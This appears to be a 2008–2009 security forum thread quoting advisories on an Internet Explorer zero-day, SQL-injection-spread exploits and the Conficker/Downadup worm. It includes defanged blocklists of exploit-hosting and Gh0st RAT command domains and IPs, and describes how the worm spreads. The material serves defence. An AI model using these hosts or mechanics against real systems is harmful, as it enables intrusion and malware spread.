12.11.2008 - "Websense... has discovered that the Taiwanese search engine "look.tw" has been compromised and is infecting site visitors with malicious code. The Web site has been injected with a recently announced Internet Explorer 7 Zero Day Attack ( http://securitylabs.websense.com/content/Alerts/3259.aspx ). The exploit on the site attempts to download a malicious excutable called "ieupdate.exe". The download location is currently down, but could come back at any moment."

:fear::fear::mad::mad:

FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
Revisions:
• December 10, 2008: Advisory published
• December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds...
- Workarounds...
• Use ACL to disable OLEDB32.DLL...
• Unregister OLEDB32.DLL...
• Disable Data Binding support in Internet Explorer 8...

• December 15, 2008: Updated the workarounds, Disable XML Island functionality and Disable Row Position functionality of OLEDB32.dll.
...Registry Editor...

- http://support.microsoft.com/kb/961051
Last Review: December 14, 2008 - Revision: 3.0

:fear: :lip:

FYI...

MSIE 0-day Spreading Via SQL Injection
- http://isc.sans.org/diary.html?storyid=5464
Last Updated: 2008-12-12 01:00:18 UTC

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 12/11/08 12:05:32 -0400

IE7 0day expanded to include IE6 and IE8(beta)
- http://isc.sans.org/diary.html?storyid=5470
Last Updated: 2008-12-12 01:26:35 UTC

- http://securitylabs.websense.com/content/alerts.aspx
Date Description
12.12.2008 - ABIT China Web site Attacked by IE7 Zero Day
12.11.2008 - Taiwanese Search Engine, Look, Infected with IE 7 Zero Day

:fear::fear:

Blocks...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...It turns out the domain that ISC is reported on is also dropping some pretty nasty malware. The domain "17gamo .com" is serving up the exploits which attempt to download malware from "www .steoo .com". Please do not visit either of these sites. If successful the exploits will install a Gh0st RAT on the system. This trojan is currently using the DNS name "evetlog .3322 .org" and is beaconing to tcp port 3020.
We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 (was recently 123.165.49.135]
The IP addresses are of course subject to change, so we recommend resolving them when appropriate for traffic monitoring/blocking...."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/12/2008 - 14:17 UTC/GMT

:fear::fear:

FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
"...Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they are currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well...
vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75
...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not stop completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."
Page last modified on December 14, 2008, at 01:13 AM <<<

:fear::fear:

FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/14/2008 - 18:26 UTC/GMT:
( additions - Shadowserver recommended blocklist updates )
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

Highly recommended that you NOT visit these sites. "The majority if not all of them also house several other exploits for different vulnerabilities as well"...

:fear:

FYI... Shadowserver IEv7 0-day exploit sites / recommended blocklist sites...
Please do not visit -any- of these sites. The majority if not all of them also house several other exploits for different vulnerabilities as well...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219 *seen from SQL injection attacks*
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 ..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/16/2008 - 13:09 UTC/GMT

vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75

Updated 12/14/2008 - 18:26 UTC/GMT:
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

(Keep checking the Shadowserver URLs frequently for new updates)

:fear::fear::fear:

FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
December 17, 2008 - "Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS08-078* to address this issue. For more information about this issue, including download links for an available security update, please review MS08-078. The vulnerability addressed is the Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844**..."

** http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4844

> http://support.microsoft.com/?kbid=960714
Last Review: December 18, 2008 - Revision: 2.0

Microsoft Security Bulletin MS08-078 - Internet Explorer
Security Update for Internet Explorer (960714)
* http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx
December 17, 2008
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...
(May require restart)

:fear:

FYI...

Microsoft Security Advisory (961040)
Vulnerability in SQL Server Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961040.mspx
December 22, 2008 - "Microsoft is investigating new public reports of a vulnerability that could allow remote code execution on systems with supported editions of Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon). Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue. Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect systems that have had the workarounds* listed below applied. Currently, Microsoft is not aware of active attacks that use this exploit code or of customer impact at this time. In addition, due to the mitigating factors for default installations of MSDE 2000 and SQL Server 2005 Express, Microsoft is not currently aware of any third-party applications that use MSDE 2000 or SQL Server 2005 Express which would be vulnerable to remote attack. However, Microsoft is actively monitoring this situation to provide customer guidance as necessary...
* Workarounds...
Deny permissions on the sp_replwritetovarbin extended stored procedure..."

- http://support.microsoft.com/kb/961040
December 23, 2008

- http://isc.sans.org/diary.html?storyid=5545
Last Updated: 2008-12-23 14:13:19 UTC
___

- http://www.microsoft.com/technet/security/advisory/961040.mspx
Updated: February 10, 2009 - "...We have issued MS09-004* to address this issue... The vulnerability addressed is the SQL Server sp_replwritetovarbin Limited Memory Overwrite Vulnerability
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416 ..."

* http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx

:fear:

FYI...

Microsoft Security Advisory (961509)
Research proves feasibility of collision attacks against MD5
- http://www.microsoft.com/technet/security/advisory/961509.mspx
December 30, 2008 - "Microsoft is aware that research was published at a security conference proving a successful attack against X.509 digital certificates signed using the MD5 hashing algorithm. This attack method could allow an attacker to generate additional digital certificates with different content that have the same digital signature as an original certificate. The MD5 algorithm had previously shown a vulnerability, but a practical attack had not yet been demonstrated. This new disclosure does not increase risk to customers significantly, as the researchers have not published the cryptographic background to the attack, and the attack is not repeatable without this information. Microsoft is not aware of any active attacks using this issue and is actively working with certificate authorities to ensure they are aware of this new research and is encouraging them to migrate to the newer SHA-1 signing algorithm. While this issue is not a vulnerability in a Microsoft product, Microsoft is actively monitoring the situation and has worked with affected Certificate Authorities to keep customers informed and to provide customer guidance as necessary...
Mitigating Factors...
• Most public Certificate Authority roots no longer use MD5 to sign certificates, but have upgraded to the more secure SHA-1 algorithm. Customers should contact their issuing Certificate Authority for guidance.
• When visited, Web sites that use Extended Validation (EV) certificates show a green address bar in most modern browsers. These certificates are always signed using SHA-1 and as such are not affected by this newly reported research...
Suggested Actions...
• Do not sign digital certificates with MD5
Certificate Authorities should no longer sign newly generated certificates using the MD5 algorithm, as it is known to be prone to collision attacks. Several alternative and more secure technologies are available, including SHA-1, SHA-256, SHA-384 or SHA-512.
Impact of action: Older hardware-based solutions may require upgrading to support these newer technologies...

:fear:

FYI...

- http://isc.sans.org/diary.html?storyid=5596
Last Updated: 2008-12-31 14:26:41 UTC - "Symantec has identified W32.Downadup.B as a new worm that is spreading by taking advantage of the RPC vulnerability from MS08-067*. It does various things to install and hide itself on the infected computer. It removes any System Restore points that the user has set and disables the Windows Update Service. It looks for ADMIN$ shares on the local network and tries to brute force the share passwords with a built-in dictionary. At this point in time, the worm's purpose appears to be simply to spread and infect as many computers as possible. After January 1, 2009, it will try to reach out to a variety of web sites to pull down an updated copy of itself. You can find examples of the domain names in the Symantec W32.Downadup.B writeup**..."

Vulnerability in Server Service Could Allow Remote Code Execution (958644)
* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

** http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&tabid=2

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250

- http://secunia.com/advisories/32326
Last Update: 2008-10-24
Critical: Highly critical...

MS08-067 out-of-band netapi32.dll security update
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

- http://support.microsoft.com/?kbid=958644

- http://www.us-cert.gov/cas/techalerts/TA08-297A.html

:fear:

FYI...

- http://preview.tinyurl.com/7jxs8z
01-06-2009 (Symantec blogs) - "... the most commonly infected systems appear to be Windows XP SP1 and earlier. Over 500,000 of the infected computers that contacted our server were running these operating system versions. Close behind was Windows XP SP2 and later systems. Windows 2000 and Windows 2003 had smaller shares. We believe that the W32.Downadup.A propagation routine has been very aggressive. It will continue to infect computers in the near future and receive updates via the aforementioned mechanism. Symantec discovered a new variant of this worm on December 30, 2008, dubbed W32.Downadup.B. This updated version contains additional propagation routines and what appears to be an altered domain generation routine. It’s not currently known if this new version was seeded to W32.Downadup.A infections or has independently spread through its own propagation routines.
We strongly encourage all users to ensure that the patches available in MS08-067 have been applied and that antivirus products are fully up-to-date to ensure that this threat does not find its way onto computers."
(Charts available at the URL above.)

:fear::mad::fear:

FYI...

- http://www.f-secure.com/weblog/archives/00001574.html
January 6, 2009 - "Over the last (few) days, we've received reports of corporate networks getting infected with variants of MS08-067 worms. These are mostly Downadup/Conficker variants. The malware uses server-side polymorphism and ACL modification to make network disinfection particularly difficult. A sign of infection is that user accounts become locked out of an Active Directory domain as the worm attempts to crack account passwords using a built-in dictionary. When it fails, it leads to those accounts being locked. We have detailed information about the malware functionality in our Downadup.AL description*. We also have a separate tool available to assist in disinfecting. The tool is available from here**. We also recommend system administrators block access to web sites used by the worm..." (Long list available at the URL above.)

* http://www.f-secure.com/v-descs/worm_w32_downadup_al.shtml

** ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
Last revised: 11/21/2008
CVSS v2 Base Score: 10.0 (HIGH)

:fear::fear::mad:

FYI...

Downadup Blocklist
- http://www.f-secure.com/weblog/archives/00001577.html
January 9, 2009 - "Our post on Tuesday included a list of domains used by the Downadup worm. Today's list includes 1,500 additional sites used by the worm*."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist.txt

:fear::fear:

More...

New variants of W32.Downadup.B find new ways to propagate
- http://preview.tinyurl.com/ay432s
01-09-2009 Symantec Security Response Blog - "Symantec has observed an increase in infections relating to W32.Downadup over the holiday period and is urging organizations to apply the patch for Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067) as soon as possible. A new variant of this threat, called W32.Downadup.B, appeared on December 30th and can not only propagate by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability, but can also spread through corporate networks by infecting USB sticks and accessing weak passwords... W32.Downadup.B creates an autorun.inf file on all mapped drives so that the threat automatically executes when the drive is accessed. The threat then monitors for drives that are connected to the compromised computer in order to create an autorun.inf file as soon as the drive becomes accessible. The worm also monitors DNS requests to domains containing certain strings and blocks access to those domains so that it will appear that the network request timed out. This means infected users may not be able to update their security software from those websites. This can be problematic as worm authors generally dish out new variants constantly... Click here** to obtain more information about how to prevent a threat from spreading using the "AutoRun" feature... more detail on the evolution and infection statistics of this threat, check out the earlier Security Response blog posting*..."
W32.Downadup Infection Statistics
* http://preview.tinyurl.com/7jxs8z
01-06-2009 - "...graph shows the statistics, over a 72-hour period, of unique IP addresses versus unique IP address and user-agent pairs..."

** http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2008032111570648

:fear::fear::fear:

FYI...

Preemptive Downadup Domain Blocklist, Jan. 13-16
- http://www.f-secure.com/weblog/archives/00001578.html
January 12, 2009 - "Downadup variants use algorithmically determined URLs to report back to the bad guys. Reverse engineering the worm's code provides us with the method to predict which domains may be used in the future. Today's preemptive blocklist* includes an additional 1,000 URLs that WILL BE used by the Downadup from the 13th to the 16th. Network administrators can use this list as a preventive measure."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist_13_16.txt

- http://isc.sans.org/diary.html?storyid=5671
Last Updated: 2009-01-12 22:43:54 UTC

- http://www.fortiguardcenter.com/reports/MS08-067-Conficker.html
(MS08-067 exploit activity from October 2008 to January 2009...) graphic

:fear::fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jan.mspx
January 13, 2009 - "This bulletin summary lists security bulletin.. released for January 2009... (-1-)

Microsoft Security Bulletin MS09-001
Vulnerabilities in SMB Could Allow Remote Code Execution (958687)
- http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software:
Microsoft Windows 2000 SP4, XPSP2, XPSP3, Server 2003 - Critical
Vista SP1, Server 2008 - Moderate
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5677
Last Updated: 2009-01-13 18:15:14 UTC
___

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4114
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4834
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4835
___

MS09-001: Prioritizing the deployment of the SMB bulletin
- http://preview.tinyurl.com/8elasn
(MS Security Vulnerability Research & Defense blog) - "...In terms of prioritizing the deployment of this update, we recommend updating SMB servers and Domain Controllers immediately since a system DoS would have a high impact. Other configurations should be assessed based on the role of the machine. For example, non-critical workstations could be considered lower priority assuming a system DoS is an acceptable risk. Systems with SMB blocked at the host firewall could also be updated more slowly..."
___

MSRT - Jan.2009 additions...
- http://support.microsoft.com/?kbid=890830
Malicious software family Tool version Current severity rating
Win32/Banload - January 2009 (V 2.6) Moderate
Win32/Conficker* - January 2009 (V 2.6) High ...
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Win32%2fConficker
(aka - Downadup)

Download:
- http://preview.tinyurl.com/6bb67
File Name: windows-kb890830-v2.6.exe
Version: 2.6
Date Published: 1/13/2009
___

- http://www.f-secure.com/weblog/archives/00001579.html
January 13, 2009 11:21 GMT - "... final count is: 2,395,963 infections worldwide. This figure is conservative; the real number is certainly higher."
- http://www.f-secure.com/weblog/archives/00001580.html
January 14, 2009 - "...worldwide Downadup infection count... Today's total infection count is an estimated 3,521,230 infections worldwide. That's over one million new infections since yesterday (and we still consider this to be a conservative estimate)."

:fear:

FYI...

- http://preview.tinyurl.com/9fc4ze
January 15, 2009 (Computerworld) - "The worm that has infected several million Windows PCs is causing havoc because nearly a third of all systems remain unpatched 80 days after Microsoft Corp. rolled out an emergency fix, a security expert said today. Based on scans of several hundred thousand customer-owned Windows PCs, Qualys Inc.* concluded that about 30% of the machines have not yet been patched with the "out of cycle" fix Microsoft provided Oct. 23 as security update MS08-067..."
* http://www.qualys.com/research/alerts/view.php/2008-10-23

- http://preview.tinyurl.com/8tr9fg
January 15, 2009 (Avert Labs) - "...While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself..."

NOTES:
1. It appears that this could, in part, be due to an MS Update site problem of a sort. MS08-067 was NOT offered on an XPSP2 system during the monthly update for Nov'08, nor during both of the Dec'08 runs (including the check/update for the IE 0-day fix). MS08-067 appears to have been installed during an XPSP3 update from the MS Update site just before year-end. YMMV.
2. A second XPSP2 machine - checked ReportingEvents.log located in %windir%\SoftwareDistribution ... found MS08-067 (KB958644) installed 10.23.2008, but dates shown in >Control Panel >Add/Remove programs show KB958644 install date occurred when XPSP3 was installed at year-end. WTF.

:fear: :sad: :spider:

FYI...

- http://www.f-secure.com/weblog/archives/00001584.html
January 16, 2009 - "The number of Downadup infections are skyrocketing based on our calculations. From an estimated 2.4 million infected machines to over 8.9 million during the last four days. That's just amazing. We've received a number of queries on just how exactly we're producing our estimates. There's been interest from Internet operators, CERTs, and fellow antivirus researchers. There's also been several posts to our blog comments, doubting our numbers... So let us explain how we are generating the numbers. There are several different variants of Downadup out there. The algorithm to create the domain names vary a bit between the variants. We've been tracking the variant we believe to be most common. It creates 250 possible domains each day. We've registered some selected domains out of this pool and are monitoring the connections being made to them... We first tried to count unique User-Agent headers per IP address, but the results weren't very good as in a standardized corporate network, most machines have identical User-Agents. So, with a little digging we discovered that in the /search/q=NUMBER query, the number is not random. It's basically a global variable in the code, getting incremented (thread-safely through InterlockedIncrement) every time the malware has successfully exploited a machine via MS08-067*. The incrementation is done in the httpd thread of the malware, after it has exploited a machine successfully. So this number tells us how many other computers this machine has exploited since it was last restarted... We wrote a program that parses the logs, extracting the highest "q" value for the IP/User-Agent pairs. These are then added together to get our figures. As you can see now, they are very conservative. And they are showing more than 8 million infected machines right now. The situation with Downadup is not getting better. It's getting worse."
(Complete detail shown at the F-secure URL above.)

* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

:fear: :sad: :fear:

FYI...

- http://blog.trendmicro.com/the-mess-that-is-worm_downad/
Jan. 20, 2009 - "The North American region has the most number of infected PCs, with users from the United States being hit the most. Japan, China, and Taiwan are also major DOWNAD-affected countries. In Europe, Italy and Spain had the most infections however other countries have also been affected. Users observe the following symptoms when they are infected with WORM_DOWNAD.AD:
• Blocked access to antivirus-related sites
• Disabled services such as Windows Automatic Update Service
• High traffic on affected system’s port 445
• Hidden files even after changes in Folder Options
• Inability to log in using Windows credentials because they are locked out
A .DLL file with random file names and autorun.inf also appear in all mapped drives, and in Internet Explorer and Movie Maker folders under the Program Files directory. The worm locks its dropped copy to prevent users from reading, writing, and deleting the malicious file. It also makes several registry changes to allow simultaneous network connections. By re-infecting machines, this worm manages to keep its malicious activities going on... Patching systems and programs as soon as fixes are made available and disabling autorun* are two of the most important actions required to reduce the risk of infection, infection propagation or reinfection with variant updates..."
(Global map of infections available at the URL above.)

NoDriveTypeAutoRun
* http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93502.mspx?mfr=true

:fear:

FYI...

MS patch needs to be installed manually to disable -Autorun- on W2K, XP, and W2K3.
- http://preview.tinyurl.com/ck79cs
January 22, 2009 (Computerworld) - "...US-CERT said that most Windows users would have to manually go to Microsoft's Web site to grab the KB953252* update. "Note that this fix has been released via [Windows] Update to Windows Vista and Server 2008 systems as part of the MS08-038 Security Bulletin," said the security organization, talking about a July 2008 patch. "Windows 2000, XP and Server 2003 users must install the update manually." Microsoft has -not- issued the KB953252 update to Windows 2000, XP or Server 2003 systems via Windows Update or the corporate-oriented Windows Server Update Services (WSUS). US-CERT confirmed that the KB653252 update -does- fix the bug it had pointed out the day before**. "Our testing has shown that installing this update -and- setting the NoDriveTypeAutoRun registry value to 0xFF -will- disable Autorun," said US-CERT..."

* http://support.microsoft.com/kb/953252

** http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009: Added reference and details for Microsoft KB953252

- http://www.secureworks.com/research/threats/downadup-removal/
"...F-Secure also has a removal tool available, however the f-secure.com domain is in the blocked list of domain names (per infection)... Using an IP address instead of the hostname will bypass the worm's blocking routines, so that tool could be downloaded by infected systems at this URL: ftp://193.110.109.53/anti-virus/tools/beta/f-downadup.zip ..."

:fear: :rolleyes:

FYI...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0243
Last revised:01/22/2009
CVSS v2 Base Score:7.2 (HIGH)
Overview: Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code...

- http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009

- http://isc.sans.org/diary.html?storyid=5695
Last Updated: 2009-01-15 08:38:46 UTC

:fear:

FYI...

Preemptive Downadup blocklist for February 2009
- http://www.f-secure.com/weblog/archives/00001593.html
January 30, 2009 - "... new list of potential domains for the month of February. The list reflects what we think to be the most common variant of Downadup in-the-wild..."
* http://www.f-secure.com/weblog/archives/Downadup_Domain_Blocklist_February.txt

:fear::mad::fear:

FYI...

Microsoft Security Bulletin MS08-037 – Important
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Published: July 8, 2008
...Why was this security bulletin revised on January 13, 2009?
Microsoft revised this bulletin to communicate that the update offered by this bulletin may -not- have been correctly offered to all systems running Windows XP SP3. The detection and deployment issue has been fixed, and customers with Windows XP Service Pack 3 systems who have not already applied the update from this bulletin will now be correctly offered the update...
• V2.3 (January 13, 2009): Added a new entry to the Frequently Asked Questions (FAQ) Related to This Security Update section to communicate the fix to a detection and deployment issue with Windows XP Service Pack 3. There were no changes to the binaries or packages for this update. Customers who have successfully updated their systems do not need to reinstall this update.

Ed. note: 'Makes one wonder if the same was true for MS08-067...

:sad:

FYI...

Protect Your Network from Conficker
- http://technet.microsoft.com/en-us/security/dd452420.aspx
February 6, 2009 - "This page aims to help customers by providing consolidated information about Conficker that customers can use to protect their systems and with which to recover systems that have been infected..."

("Related Links" also available at the URL above.)

:fear:

FYI...

OpenDNS to roll out Conficker tracking - blocking
- http://www.theregister.co.uk/2009/02/07/opendns_conficker_protection/
7 February 2009 21:32 GMT - "With an estimated 10 million PCs infected by the stealthy worm known as Conficker, it's a good bet that plenty of administrators are blissfully unaware that their networks are playing host to the pest. Now, a free service called OpenDNS* is offering a new feature designed to alert administrators to the damage and help them contain it.
The company on Monday plans to introduce an addition to its offerings that makes it easy for admins to know if even a single machine has been infected by Conficker. The service will also automatically protect infected machines by preventing them from connecting to rogue servers controlled by the malware authors... Without the service, admins would have to manually block 1,750 domains each week, or 91,250 each year. The service will also help network admins to quickly pinpoint any infected machines by checking their OpenDNS Dashboard. Starting Monday, any networks with PCs that try to connect to the Conficker addresses will be flagged on an admin's private statistics page. The service is available for free to both businesses and home users... The service is first offered under a new botnet protection service being rolled out by OpenDNS... The list of blocked domains is being provided by anti-virus provider Kaspersky, which reverse-engineered Conficker so it could preemptively predict the new sites that will be used each day."
* https://www.opendns.com/homenetwork/start/

- http://blog.opendns.com/2009/02/09/stats-are-back-and-conficker/
Feb 9, 2009

- http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.Sinkholes
February 16, 2009

:bigthumb:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-feb.mspx
February 10, 2009 - "This bulletin summary lists security bulletins released for February 2009... (-4-)

Critical -2-

Microsoft Security Bulletin MS09-002
Cumulative Security Update for Internet Explorer (961260)
- http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer

Microsoft Security Bulletin MS09-003
Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239)
- http://www.microsoft.com/technet/security/bulletin/ms09-003.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Exchange Server

Important -2-

Microsoft Security Bulletin MS09-004
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)
- http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft SQL Server
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416
Last revised:02/12/2009
CVSS v2 Base Score: 9.0 (HIGH)

Microsoft Security Bulletin MS09-005
Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634)
- http://www.microsoft.com/technet/security/bulletin/ms09-005.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5836
Last Updated: 2009-02-10 18:59:20 UTC

.

FYI...

MS Security Bulletin MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Updated: February 10, 2009 - This security update resolves five privately reported vulnerabilities and one publicly disclosed vulnerability in the ActiveX controls for the Microsoft Visual Basic 6.0 Runtime Extended Files. These vulnerabilities could allow remote code execution if a user browsed a Web site that contains specially crafted content. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights...

...Further details can be found in the security release issued by Akamai:
- http://www.akamai.com/html/support/security.html

...Further details can be found in the security release issued by RIM:
- http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB16248

• V1.2 (February 10, 2009): Clarified the class IDs for two ActiveX controls.
First, listed a second class ID in the workaround, "Prevent Windows Common AVI ActiveX Control from running in Internet Explorer," for CVE-2008-4255.
Second, listed in the section, Frequently asked questions (FAQ) related to this security update, the class ID for the Winsock Control for which the kill bit is being set as a security-related change to functionality in this update. This is an informational change only. There were no changes to the security update files in this bulletin.

//

Microsoft Security Advisory (960715)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/960715.mspx
Published: February 10, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for previously published Microsoft security bulletins:
• MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
For more information about installing this update, see:
Update Rollup for ActiveX Kill Bits
- http://support.microsoft.com/kb/960715
February 10, 2009

:fear:

FYI...

MSRT February 2009 - Win32/Srizbi
- http://preview.tinyurl.com/d59enk
February 10, 2009 Microsoft Malware Protection Center - "This month's MSRT takes on one of the largest botnets currently active worldwide – Win32/Srizbi. The Srizbi family of malware consists of trojan droppers and rootkits that often spread through spam e-mails containing download links to the malware. Much like its alleged close cousin Win32/Rustock (which is removed by the MSRT since Oct 2008), the Srizbi family of malware was developed mainly for the purpose of spam-for-hire operations. The Srizbi malware authors offer the botnet as an efficient method of sending spam e-mails for any organization who would stoop low enough to utilize this mechanism for advertising their intent..."
> http://www.microsoft.com/security/malwareremove/default.mspx

:fear: :bigthumb:

FYI...

- http://blog.trendmicro.com/another-exploit-targets-ie7-bug/
Feb. 17, 2009 - "Cybercriminals are actively exploiting a critical vulnerability in Internet Explorer 7, which arises from the browser’s improper handling of errors when attempting to access deleted objects. This vulnerability allows remote attackers to execute arbitrary codes on a vulnerable machine. The threat starts with a spammed malicious .DOC file detected as XML_DLOADR.A. This file has a very limited distribution script, suggesting it may be a targeted attack. It contains an ActiveX object that automatically accesses a site rigged with a malicious HTML detected by the Trend Micro Smart Protection Network as HTML_DLOADER.AS. HTML_DLOADER.AS exploits the CVE-2009-0075* vulnerability, which is already addressed by the MS09-002** security patch released last week. On an unpatched system though, successful exploitation by HTML_DLOADER.AS downloads a backdoor detected as BKDR_AGENT.XZMS. This backdoor further installs a .DLL file that has information stealing capabilities. It sends its stolen information to another URL via port 443... Our engineers are still working on the details of this threat. We will post updates as soon as more information becomes available..."
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0075
Last revised: 02/17/2009

** http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx

- http://isc.sans.org/diary.html?storyid=5884
Last Updated: 2009-02-17 19:55:10 UTC - "...there is absolutely nothing preventing attackers from using the exploit in a drive-by attack (and we can, unfortunately, expect that this will happen very soon)..."

- http://www.us-cert.gov/current/#malware_exploiting_microsoft_internet_explorer
February 17, 2009

:fear: :spider: :fear:

FYI...

- http://vrt-sourcefire.blogspot.com/2009/02/ms09-002-in-wild.html
February 18, 2009 - "Yesterday we came across a website taking advantage of a programming error in Internet Explorer that allows a remote attacker to execute code on a vulnerable system. Microsoft issued an advisory (MS09-002) on February 10, 2009 and released a patched on the same day to mitigate the problem. We released same-day coverage for this and other vulnerabilities*... Upon visiting the compromised page with Internet Explorer 7 on a vulnerable machine, a malicious script is executed, which in turn downloads an executable on the system before crashing the web browser...
UPDATE: As of 11AM EST on Feb 19, 2009, another Chinese website is leveraging MS09-002 to push malware to victims..."
* http://www.snort.org/vrt/advisories/vrt-rules-2009-02-10.html
'Better known as "Drive-by malware"...
________________________________________

Cumulative Security Update for Internet Explorer - Extreme Severity
